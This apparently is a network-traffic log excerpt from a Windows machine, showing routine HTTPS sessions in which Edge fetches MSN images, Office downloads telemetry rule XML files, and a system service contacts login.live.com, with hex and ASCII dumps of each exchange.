2024-11-10 03:55:31 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	49909	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	506	OUT	GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:31 UTC	549	IN	HTTP/1.1 200 OK Last-Modified: Wed, 23 Oct 2024 20:31:12 GMT Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 17955 X-Datacenter: eastap X-ActivityId: 53621c4b-f6ac-4e45-8979-9690752d9442 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 8192 Cache-Control: public, max-age=103173 Expires: Mon, 11 Nov 2024 08:35:04 GMT Date: Sun, 10 Nov 2024 03:55:31 GMT Connection: close
2024-11-10 03:55:31 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.5	49910	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:31 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:32 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: a4b2601f-a01e-006f-5d5f-2e13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035532Z-15869dbbcc6lxrkghC1DFWqpdc00000004c000000000eccw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:32 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	49911	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:32 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:32 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 9ad52bc4-d01e-005a-6aef-2f7fd9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035532Z-17df447cdb56mx55hC1DFWvbt400000005b0000000006rmg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.5	49912	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:32 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:32 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035532Z-16547b76f7fkcrm9hC1DFWxdag0000000c7g000000007zsk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	49913	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:32 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:32 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 72e3f643-801e-007b-5dd2-2ce7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035532Z-16547b76f7fdf69shC1DFWcpd00000000bz000000000ghmg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:32 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	49916	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:32 UTC	505	OUT	GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:32 UTC	548	IN	HTTP/1.1 200 OK Last-Modified: Sun, 27 Oct 2024 03:02:23 GMT Access-Control-Allow-Origin: * X-Datacenter: eastus X-ActivityId: 683883c6-129c-4c4d-8b5e-e40362872f49 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 62552 Content-Length: 8192 Cache-Control: public, max-age=385727 Expires: Thu, 14 Nov 2024 15:04:19 GMT Date: Sun, 10 Nov 2024 03:55:32 GMT Connection: close
2024-11-10 03:55:32 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.5	49915	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:32 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:32 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 12ef7264-e01e-003c-02a0-31c70b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035532Z-17df447cdb5zfhrmhC1DFWh330000000088g00000000g2yt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:32 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49914	40.126.31.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:32 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-10 03:55:32 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-10 03:55:33 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sun, 10 Nov 2024 03:54:32 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C519_BL2 x-ms-request-id: 8cb039b3-58d2-4dee-821e-8445581d66c5 PPServer: PPV: 30 H: BL02EPF0001D7E8 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 10 Nov 2024 03:55:32 GMT Connection: close Content-Length: 11392
2024-11-10 03:55:33 UTC	11392	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	49921	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	505	OUT	GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:33 UTC	549	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sun, 03 Nov 2024 13:30:12 GMT X-Datacenter: northeu X-ActivityId: 7f006101-ea16-4553-afba-408982c6df36 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 95457 Content-Length: 8192 Cache-Control: public, max-age=250469 Expires: Wed, 13 Nov 2024 01:30:02 GMT Date: Sun, 10 Nov 2024 03:55:33 GMT Connection: close
2024-11-10 03:55:33 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	49920	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:33 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:33 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035533Z-16547b76f7f67wxlhC1DFWah9w0000000byg00000000s5kw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:33 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" 